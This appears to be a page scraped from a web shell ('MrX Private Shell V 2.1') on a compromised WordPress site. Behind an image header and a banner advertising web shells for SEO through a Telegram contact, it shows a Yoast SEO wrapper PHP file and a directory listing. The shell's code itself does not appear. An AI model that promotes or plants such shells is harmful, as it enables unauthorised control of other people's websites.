����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Yoast\WP\SEO\WordPress;
use wpdb;
use WPSEO_Addon_Manager;
use WPSEO_Admin_Asset_Manager;
use WPSEO_Replace_Vars;
use WPSEO_Shortlinker;
use WPSEO_Utils;
/**
* Wrapper class for WordPress globals.
*
* This consists of factory functions to inject WP globals into the dependency container.
*/
class Wrapper {
/**
* Wrapper method for returning the wpdb object for use in dependency injection.
*
* @return wpdb The wpdb global.
*/
public static function get_wpdb() {
global $wpdb;
return $wpdb;
}
/**
* Factory function for replace vars helper.
*
* @return WPSEO_Replace_Vars The replace vars helper.
*/
public static function get_replace_vars() {
return new WPSEO_Replace_Vars();
}
/**
* Factory function for the admin asset manager.
*
* @return WPSEO_Admin_Asset_Manager The admin asset manager.
*/
public static function get_admin_asset_manager() {
return new WPSEO_Admin_Asset_Manager();
}
/**
* Factory function for the addon manager.
*
* @return WPSEO_Addon_Manager The addon manager.
*/
public static function get_addon_manager() {
return new WPSEO_Addon_Manager();
}
/**
* Factory function for the shortlinker.
*
* @return WPSEO_Shortlinker
*/
public static function get_shortlinker() {
return new WPSEO_Shortlinker();
}
/**
* Factory function for the utils class.
*
* @return WPSEO_Utils
*/
public static function get_utils() {
return new WPSEO_Utils();
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| traits | Folder | 0755 |
|
|
| accordion.php | File | 19.8 KB | 0644 |
|
| before.php | File | 409 B | 0644 |
|
| editor-responsive.strings-20260520203706-20260520204053-20260520213840-20260520213926-20260520214012-20260520214108-20260520214202.js | File | 29 B | 0644 |
|
| html.php | File | 2.63 KB | 0644 |
|
| icon-box.php | File | 21.53 KB | 0644 |
|
| icon-list.php | File | 22.38 KB | 0644 |
|
| image-gallery.php | File | 11.4 KB | 0644 |
|
| shortcode.php | File | 3.33 KB | 0644 |
|
| testimonial.php | File | 16.97 KB | 0644 |
|
| video.php | File | 33.84 KB | 0644 |
|
| wordpress.php | File | 7.15 KB | 0644 |
|
| wrapper.php | File | 1.44 KB | 0644 |
|